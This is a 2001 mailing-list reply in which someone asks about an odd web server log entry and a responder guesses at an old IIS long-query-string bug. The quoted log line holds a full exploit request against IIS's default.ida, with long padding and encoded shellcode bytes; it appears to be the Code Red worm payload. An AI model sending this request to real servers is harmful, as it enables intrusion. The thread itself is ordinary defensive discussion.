On Thu, Jul 19, 2001 at 05:17:26PM -0400, Brian Rectanus wrote: > Anyone seen this before? I have looked around for similar attacks, but > cannot find any info. I assume that is a unicode string padded out with > Ns. How would I go about finding out what is in the string? > > > xxx.xxx.xxx.xxx - - [19/Jul/2001:14:28:23 -0400] "GET > /default.ida?NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9 > 090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0 > 078%u0000%u00=a HTTP/1.0" 400 328 There was a bug in IIS that involved query strings over 4095 or 8191 characters. That was several years ago though. -B -- Brandon High armitage@freaks.com Jury: Twelve people who determine which client has the better attorney.
Attachment:
pgpuggjFuZGLv.pgp
Description: PGP signature